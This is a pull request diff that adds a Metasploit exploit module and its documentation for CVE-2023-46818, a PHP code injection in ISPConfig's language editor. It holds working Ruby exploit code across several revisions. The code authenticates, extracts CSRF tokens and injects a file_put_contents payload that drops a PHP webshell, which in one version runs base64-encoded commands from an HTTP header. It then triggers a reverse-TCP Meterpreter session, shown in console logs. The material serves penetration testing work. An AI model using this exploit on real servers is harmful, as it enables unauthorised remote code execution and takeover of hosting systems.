### PR TITLE
Add module for ISPConfig Code Injection (CVE-2023-46818)

### DIFF
--- a/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
+++ b/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the `admin_allow_langedit` option is enabled. An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
+
+- Vendor Advisory: https://www.ispconfig.org/
+- CVE: [CVE-2023-46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
+- PoC/Details: [https://github.com/SyFi/CVE-2023-46818](https://github.com/SyFi/CVE-2023-46818)
+- Exploit writeup: [https://karmainsecurity.com/KIS-2023-13](https://karmainsecurity.com/KIS-2023-13)
+
+### Setup Example
+
+1. Download and install ISPConfig (vulnerable version, e.g., 3.2.11 or earlier)
+2. Enable `admin_allow_langedit` in the ISPConfig configuration.
+3. Create an admin user for testing.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/linux/http/ispconfig_lang_edit_php_code_injection`
+3. Set the `RHOSTS`, `USERNAME`, and `PASSWORD` options
+4. Set `TARGETURI` if ISPConfig is not at the web root
+5. Run the module
+6. You should get a Meterpreter or command shell session as the web server user.
+
+## Options
+
+### USERNAME
+The ISPConfig administrator username to authenticate with.
+
+### PASSWORD
+The ISPConfig administrator password to authenticate with.
+
+### TARGETURI
+The base path to ISPConfig (default: `/`).
+
+### LOGIN_TIMEOUT
+Timeout for login request (default: 15 seconds).
+
+### DELETE_SHELL
+Whether to delete the webshell after exploitation (default: true).
+
+## Scenarios
+
+### ISPConfig 3.2.11 (or earlier), Ubuntu 20.04
+
+```
+msf6 > use exploit/linux/http/ispconfig_lang_edit_php_code_injection
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set rhosts 192.168.1.100
+rhosts => 192.168.1.100
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set username admin
+username => admin
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set password adminpass
+password => adminpass
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
+
+[*] Started reverse TCP handler on 192.168.1.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] ISPConfig installation detected
+[*] Attempting login with username 'admin' and password 'adminpass'
+[+] Login successful!
+[*] Injecting PHP shell...
+[+] CSRF tokens extracted: ID=abc123..., KEY=def456...
+[+] Shell successfully injected: sh_xxxxx.php
+[*] Starting payload handler...
+[+] PHP payload triggered
+[*] Waiting for session...
+[+] Shell responsive: uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+## Notes
+- The module requires valid ISPConfig admin credentials and the `admin_allow_langedit` option enabled.
+- The shell is removed after exploitation if `DELETE_SHELL` is true.
+- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access. 

--- a/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
+++ b/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
@@ -1,6 +1,8 @@
 ## Vulnerable Application
 
-ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the `admin_allow_langedit` option is enabled. An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
+ISPConfig before 3.2.11p1 is vulnerable to PHP code injection via the language file editor (language_edit.php) if the
+`admin_allow_langedit` option is enabled.
+An authenticated administrator can inject arbitrary PHP code, leading to remote code execution on the server.
 
 - Vendor Advisory: https://www.ispconfig.org/
 - CVE: [CVE-2023-46818](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
@@ -30,9 +32,6 @@ The ISPConfig administrator username to authenticate with.
 ### PASSWORD
 The ISPConfig administrator password to authenticate with.
 
-### TARGETURI
-The base path to ISPConfig (default: `/`).
-
 ### LOGIN_TIMEOUT
 Timeout for login request (default: 15 seconds).
 
@@ -54,7 +53,7 @@ password => adminpass
 msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
 
 [*] Started reverse TCP handler on 192.168.1.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Running automatic check ('set AutoCheck false' to disable)
 [+] ISPConfig installation detected
 [*] Attempting login with username 'admin' and password 'adminpass'
 [+] Login successful!
@@ -75,4 +74,4 @@ Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 20
 ## Notes
 - The module requires valid ISPConfig admin credentials and the `admin_allow_langedit` option enabled.
 - The shell is removed after exploitation if `DELETE_SHELL` is true.
-- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access. 
+- The exploit drops a PHP webshell and triggers the payload for Meterpreter or command shell access.

--- a/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
+++ b/documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md
@@ -32,43 +32,35 @@ The ISPConfig administrator username to authenticate with.
 ### PASSWORD
 The ISPConfig administrator password to authenticate with.
 
-### LOGIN_TIMEOUT
-Timeout for login request (default: 15 seconds).
-
-### DELETE_SHELL
-Whether to delete the webshell after exploitation (default: true).
 
 ## Scenarios
 
 ### ISPConfig 3.2.11 (or earlier), Ubuntu 20.04
 
 ```
-msf6 > use exploit/linux/http/ispconfig_lang_edit_php_code_injection
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set rhosts 192.168.1.100
-rhosts => 192.168.1.100
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set username admin
-username => admin
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set password adminpass
-password => adminpass
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
-
-[*] Started reverse TCP handler on 192.168.1.1:4444
-[*] Running automatic check ('set AutoCheck false' to disable)
-[+] ISPConfig installation detected
-[*] Attempting login with username 'admin' and password 'adminpass'
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run verbose=true
+[*] Started reverse TCP handler on 192.168.168.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if the target is ISPConfig...
+[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
 [+] Login successful!
-[*] Injecting PHP shell...
-[+] CSRF tokens extracted: ID=abc123..., KEY=def456...
-[+] Shell successfully injected: sh_xxxxx.php
-[*] Starting payload handler...
-[+] PHP payload triggered
-[*] Waiting for session...
-[+] Shell responsive: uid=33(www-data) gid=33(www-data) groups=33(www-data)
+[+] ISPConfig version detected: ISPConfig Version: 3.2.10
+[+] The target appears to be vulnerable. Version: ISPConfig Version: 3.2.10
+[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
+[+] Login successful!
+[*] Checking if admin_allow_langedit is enabled...
+[+] Language editor is accessible - admin_allow_langedit appears to be enabled
+[*] Injecting PHP payload...
+[+] Extracted CSRF tokens: ID=language_ed..., KEY=86845285663...
+[*] Sending stage (40004 bytes) to 192.168.168.186
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.186:58822) at 2025-07-07 11:51:12 +0200
 
-id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)
-uname -a
-Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+
+meterpreter >
+meterpreter > sysinfo
+Computer    : server1
+OS          : Linux server1 6.8.0-60-generic #63~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 22 19:00:15 UTC 2 x86_64
+Meterpreter : php/linux
 ```
 
 ## Notes

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -1,0 +1,237 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ISPConfig language_edit.php PHP Code Injection',
+        'Description' => %q{
+          An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'syfi' # Discovery and PoC
+        ],
+        'References' => [
+          ['CVE', '2023-46818'],
+          ['URL', 'https://github.com/SyFi/CVE-2023-46818'],
+          ['URL', 'https://karmainsecurity.com/KIS-2023-13'],
+          ['URL', 'https://karmainsecurity.com/pocs/CVE-2023-46818.php']
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'Automatic PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2023-10-24',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to ISPConfig', '/']),
+      OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
+      OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
+    ])
+
+    register_advanced_options([
+      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
+      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is ISPConfig...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login', '')
+    })
+    return CheckCode::Unknown unless res
+    if res.body.include?('ISPConfig') || res.body.include?('ispconfig')
+      print_good('ISPConfig installation detected')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  end
+
+  def authenticate
+    print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login', ''),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        's_mod' => 'login'
+      },
+      'keep_cookies' => true
+    }, datastore['LOGIN_TIMEOUT'])
+    fail_with(Failure::NoAccess, 'Login request failed') unless res
+    if res.body.match(/Username or Password wrong/i)
+      fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
+    end
+    if res.headers['Location'] && res.headers['Location'].include?('admin') ||
+       res.body.downcase.include?('dashboard')
+      print_good('Login successful!')
+      return true
+    end
+    print_warning('Login status unclear, attempting to continue...')
+    true
+  end
+
+  def generate_random_string(length = 10)
+    charset = ('a'..'z').to_a
+    Array.new(length) { charset.sample }.join
+  end
+
+  def generate_shell_code
+    print_status('Generating PHP payload...')
+    php_payload = payload.encoded
+    php_shell = %Q{<?php\nprint('____SHELL_START____');\nif(isset($_SERVER['HTTP_CMD'])) {\n  $cmd = base64_decode($_SERVER['HTTP_CMD']);\n  if($cmd == 'PAYLOAD_TRIGGER') {\n    #{php_payload}\n  } elseif($cmd) {\n    passthru($cmd);\n  }\n} else {\n  #{php_payload}\n}\nprint('____SHELL_END____');\n?>}
+    Rex::Text.encode_base64(php_shell)
+  end
+
+  def inject_shell
+    print_status('Injecting PHP shell...')
+    @shell_file = "sh_#{generate_random_string}.php"
+    php_code = generate_shell_code
+    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
+    lang_file = generate_random_string + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
+    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
+    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
+    unless csrf_id_match && csrf_key_match
+      fail_with(Failure::UnexpectedReply, 'CSRF tokens not found!')
+    end
+    csrf_id = csrf_id_match[1]
+    csrf_key = csrf_key_match[1]
+    print_good("CSRF tokens extracted: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
+    injection_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file,
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'records[\\]' => injection
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    }, 10)
+    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
+    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
+    print_status('Verifying shell injection...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'keep_cookies' => true
+    }, 5)
+    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
+      print_good("Shell successfully injected: #{@shell_file}")
+      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
+      return shell_url
+    else
+      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
+    end
+  end
+
+  def execute_command(command, shell_uri = nil)
+    return nil unless @shell_file
+    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
+    encoded_cmd = Rex::Text.encode_base64(command)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => shell_url,
+      'headers' => {
+        'CMD' => encoded_cmd
+      },
+      'keep_cookies' => true
+    }, 15)
+    return nil unless res
+    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
+    return output_match[1] if output_match
+    nil
+  end
+
+  def trigger_payload(shell_uri)
+    print_status('Triggering PHP payload...')
+    framework.threads.spawn('PayloadTrigger', false) do
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => shell_uri,
+        'keep_cookies' => true
+      }, 10)
+    end
+    framework.threads.spawn('PayloadTriggerManual', false) do
+      select(nil, nil, nil, 2)
+      execute_command('PAYLOAD_TRIGGER', shell_uri)
+    end
+    print_good('PHP payload triggered')
+  end
+
+  def exploit
+    authenticate
+    shell_uri = inject_shell
+    print_status('Starting payload handler...')
+    trigger_payload(shell_uri)
+    print_status('Waiting for session...')
+    select(nil, nil, nil, 5)
+    if framework.sessions.length == 0
+      print_warning('No session established automatically')
+      print_status('Testing shell functionality...')
+      output = execute_command('id', shell_uri)
+      if output
+        print_good("Shell responsive: #{output.strip}")
+        print_line("\n" + '=' * 60)
+        print_status('Shell Access Information:')
+        print_line("URL: #{full_uri}#{shell_uri}")
+        print_line("Usage: Send base64 encoded commands via 'CMD' HTTP header")
+        print_line("Manual trigger: curl '#{full_uri}#{shell_uri}'")
+        print_line("Command example: curl -H 'CMD: #{Rex::Text.encode_base64('id')}' '#{full_uri}#{shell_uri}'")
+        print_line('=' * 60)
+      else
+        print_error('Shell test failed')
+        print_line("Manual test: curl '#{full_uri}#{shell_uri}'")
+      end
+    end
+  end
+end 

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -73,9 +73,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     print_status('Checking if the target is ISPConfig...')
+    return CheckCode::Unknown('Failed to login') unless authenticate
     # Always try to log in and parse version, since credentials are required
     # cookie_jar.clear (handled in exploit)
-    return CheckCode::Safe unless authenticate
     # Try to access the dashboard or settings page
     settings_res = send_request_cgi({
       'method' => 'GET',
@@ -111,16 +111,14 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'keep_cookies' => true
     })
-    fail_with(Failure::NoAccess, 'Login request failed') unless res
+    return false unless res
     if res&.code == 302
       res = send_request_cgi({
         'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'login/',res&.headers.fetch('Location',nil))
       })
     end
-    if res.body.match(/Username or Password wrong/i)
-      fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
-    end
+    return false if res.body.match(/Username or Password wrong/i)
     if res.headers.fetch('Location',nil)&.include?('admin') ||
        res.body.downcase.include?('dashboard')
       print_good('Login successful!')
@@ -250,9 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cookie_jar.clear
-    unless authenticate
-      fail_with(Failure::NoAccess, 'Login failed')
-    end
+    fail_with(Failure::NoAccess, 'Authentication failed') unless authenticate
     
     # Check if language editor permissions are enabled
     unless check_langedit_permission

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -194,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
 
-    if res && res.code == 200
+    if res&.code == 200
       print_good('Successfully enabled admin_allow_langedit')
       return true
     else
@@ -237,16 +237,12 @@ class MetasploitModule < Msf::Exploit::Remote
       '_csrf_key' => csrf_key,
       'records[\]' => injection
     }
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => edit_url,
       'vars_post' => injection_data,
       'keep_cookies' => true
     })
-    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
-    payload_url = normalize_uri(target_uri.path, 'admin', @payload_file)
-    print_good("Payload successfully injected: #{@payload_file}")
-    return payload_url
   end
 
   def exploit
@@ -269,10 +265,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    payload_url = inject_payload
-    print_status('Starting payload handler...')
-    print_status('Manual trigger information:')
-    print_line("URL: #{full_uri}#{payload_url}")
-    print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
+    inject_payload
   end
 end

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -58,21 +58,16 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
       OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
     ])
-
-    register_advanced_options([
-      OptInt.new('LOGIN_TIMEOUT', [true, 'Timeout for login request', 15]),
-      OptBool.new('DELETE_SHELL', [true, 'Delete webshell after session', true])
-    ])
   end
 
   def check
-    print_status('Checking if target is ISPConfig...')
+    print_status('Checking if the target is ISPConfig...')
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login', '')
+      'uri' => normalize_uri(target_uri.path, 'login')
     })
     return CheckCode::Unknown unless res
-    if res.body.include?('ISPConfig') || res.body.include?('ispconfig')
+    if res.body.include?('ISPConfig') && (res.body.include?('login') || res.body.include?('username') || res.body.include?('password'))
       print_good('ISPConfig installation detected')
       return CheckCode::Detected
     end
@@ -83,14 +78,14 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login', ''),
+      'uri' => normalize_uri(target_uri.path, 'login'),
       'vars_post' => {
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
         's_mod' => 'login'
       },
       'keep_cookies' => true
-    }, datastore['LOGIN_TIMEOUT'])
+    })
     fail_with(Failure::NoAccess, 'Login request failed') unless res
     if res.body.match(/Username or Password wrong/i)
       fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
@@ -104,24 +99,12 @@ class MetasploitModule < Msf::Exploit::Remote
     true
   end
 
-  def generate_random_string(length = 10)
-    charset = ('a'..'z').to_a
-    Array.new(length) { charset.sample }.join
-  end
-
-  def generate_shell_code
-    print_status('Generating PHP payload...')
+  def inject_payload
+    print_status('Injecting PHP payload...')
+    @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
     php_payload = payload.encoded
-    php_shell = %Q{<?php\nprint('____SHELL_START____');\nif(isset($_SERVER['HTTP_CMD'])) {\n  $cmd = base64_decode($_SERVER['HTTP_CMD']);\n  if($cmd == 'PAYLOAD_TRIGGER') {\n    #{php_payload}\n  } elseif($cmd) {\n    passthru($cmd);\n  }\n} else {\n  #{php_payload}\n}\nprint('____SHELL_END____');\n?>}
-    Rex::Text.encode_base64(php_shell)
-  end
-
-  def inject_shell
-    print_status('Injecting PHP shell...')
-    @shell_file = "sh_#{generate_random_string}.php"
-    php_code = generate_shell_code
-    injection = "'];file_put_contents('#{@shell_file}',base64_decode('#{php_code}'));die;#"
-    lang_file = generate_random_string + ".lng"
+    injection = "'];file_put_contents('#{@payload_file}','<?php #{php_payload} ?>');die;#"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
       'lang' => 'en',
@@ -133,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => edit_url,
       'vars_post' => initial_data,
       'keep_cookies' => true
-    }, 10)
+    })
     fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
     csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
     csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
@@ -142,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     csrf_id = csrf_id_match[1]
     csrf_key = csrf_key_match[1]
-    print_good("CSRF tokens extracted: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
+    print_good("Extracted CSRF tokens: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
     injection_data = {
       'lang' => 'en',
       'module' => 'help',
@@ -156,82 +139,77 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => edit_url,
       'vars_post' => injection_data,
       'keep_cookies' => true
-    }, 10)
+    })
     fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
-    shell_url = normalize_uri(target_uri.path, 'admin', @shell_file)
-    print_status('Verifying shell injection...')
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => shell_url,
-      'keep_cookies' => true
-    }, 5)
-    if res && res.body.include?('SHELL_START') && res.body.include?('SHELL_END')
-      print_good("Shell successfully injected: #{@shell_file}")
-      register_file_for_cleanup(@shell_file) if datastore['DELETE_SHELL']
-      return shell_url
-    else
-      fail_with(Failure::UnexpectedReply, 'Shell injection failed or shell not accessible')
-    end
+    payload_url = normalize_uri(target_uri.path, 'admin', @payload_file)
+    print_good("Payload successfully injected: #{@payload_file}")
+    return payload_url
   end
 
-  def execute_command(command, shell_uri = nil)
-    return nil unless @shell_file
-    shell_url = shell_uri || normalize_uri(target_uri.path, 'admin', @shell_file)
-    encoded_cmd = Rex::Text.encode_base64(command)
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => shell_url,
-      'headers' => {
-        'CMD' => encoded_cmd
-      },
-      'keep_cookies' => true
-    }, 15)
-    return nil unless res
-    output_match = res.body.match(/____SHELL_START____(.*?)____SHELL_END____/m)
-    return output_match[1] if output_match
-    nil
-  end
-
-  def trigger_payload(shell_uri)
+  def trigger_payload(payload_url)
     print_status('Triggering PHP payload...')
-    framework.threads.spawn('PayloadTrigger', false) do
-      send_request_cgi({
-        'method' => 'GET',
-        'uri' => shell_uri,
-        'keep_cookies' => true
-      }, 10)
+    # Small delay to ensure the file is written
+    sleep(1)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => payload_url,
+      'keep_cookies' => true
+    })
+    if res && res.code == 200
+      print_good('PHP payload triggered successfully')
+    else
+      print_warning('Payload trigger response was unexpected')
     end
-    framework.threads.spawn('PayloadTriggerManual', false) do
-      select(nil, nil, nil, 2)
-      execute_command('PAYLOAD_TRIGGER', shell_uri)
-    end
-    print_good('PHP payload triggered')
+  end
+
+  def cleanup
+    return unless @payload_file
+    print_status('Cleaning up payload file...')
+    # Use the same vulnerability to delete the file
+    injection = "'];unlink('#{@payload_file}');die;#"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    initial_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => initial_data,
+      'keep_cookies' => true
+    })
+    return unless res
+    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
+    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
+    return unless csrf_id_match && csrf_key_match
+    csrf_id = csrf_id_match[1]
+    csrf_key = csrf_key_match[1]
+    injection_data = {
+      'lang' => 'en',
+      'module' => 'help',
+      'lang_file' => lang_file,
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'records[\\]' => injection
+    }
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => edit_url,
+      'vars_post' => injection_data,
+      'keep_cookies' => true
+    })
+    print_good("Payload file #{@payload_file} cleaned up")
   end
 
   def exploit
     authenticate
-    shell_uri = inject_shell
+    payload_url = inject_payload
     print_status('Starting payload handler...')
-    trigger_payload(shell_uri)
-    print_status('Waiting for session...')
-    select(nil, nil, nil, 5)
-    if framework.sessions.length == 0
-      print_warning('No session established automatically')
-      print_status('Testing shell functionality...')
-      output = execute_command('id', shell_uri)
-      if output
-        print_good("Shell responsive: #{output.strip}")
-        print_line("\n" + '=' * 60)
-        print_status('Shell Access Information:')
-        print_line("URL: #{full_uri}#{shell_uri}")
-        print_line("Usage: Send base64 encoded commands via 'CMD' HTTP header")
-        print_line("Manual trigger: curl '#{full_uri}#{shell_uri}'")
-        print_line("Command example: curl -H 'CMD: #{Rex::Text.encode_base64('id')}' '#{full_uri}#{shell_uri}'")
-        print_line('=' * 60)
-      else
-        print_error('Shell test failed')
-        print_line("Manual test: curl '#{full_uri}#{shell_uri}'")
-      end
-    end
+    trigger_payload(payload_url)
+    print_status('Manual trigger information:')
+    print_line("URL: #{full_uri}#{payload_url}")
+    print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
   end
 end 

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -70,53 +69,46 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
       OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
     ])
-    
-    @authenticated = false
   end
 
   def check
     print_status('Checking if the target is ISPConfig...')
+    # Always try to log in and parse version, since credentials are required
+    # Clear any existing cookies before login
+    cookie_jar.clear
     
-    # Try to log in and parse version if credentials are provided
-    if datastore['USERNAME'] && datastore['PASSWORD']
-      # Clear any existing cookies before login
-      cookie_jar.clear
-      
-      login_res = send_request_cgi!({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'login/'),
-        'vars_post' => {
-          'username' => datastore['USERNAME'],
-          'password' => datastore['PASSWORD'],
-          's_mod' => 'login'
-        },
+    login_res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login/'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        's_mod' => 'login'
+      },
+      'keep_cookies' => true
+    })
+    if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
+      # Try to access the dashboard or settings page
+      settings_res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
         'keep_cookies' => true
       })
-      if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
-        # Try to access the dashboard or settings page
-        settings_res = send_request_cgi({
-          'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
-          'keep_cookies' => true
-        })
-        if settings_res
-          doc = settings_res.get_html_document
-          # Try to find version in a span, div, or similar element
-          version_element = doc.at('//p[@class="frmTextHead"]')
-          if version_element
-            version_text = version_element.text
-            version = version_text.split(":")[1].gsub(" ","")
-            version = Rex::Version.new(version)
-            if version < Rex::Version.new('3.2.11p1')
-              print_good("ISPConfig version detected: #{version_text}")
-              @authenticated = true
-              return CheckCode::Vulnerable("Version: #{version_text}")
-            end
+      if settings_res
+        doc = settings_res.get_html_document
+        # Try to find version in a span, div, or similar element
+        version_element = doc.at('//p[@class="frmTextHead"]')
+        if version_element
+          version_text = version_element.text
+          version = version_text.split(":")[1].gsub(" ","")
+          version = Rex::Version.new(version)
+          if version < Rex::Version.new('3.2.11p1')
+            print_good("ISPConfig version detected: #{version_text}")
+            return CheckCode::Vulnerable("Version: #{version_text}")
           end
         end
       end
     end
-
     CheckCode::Safe
   end
 
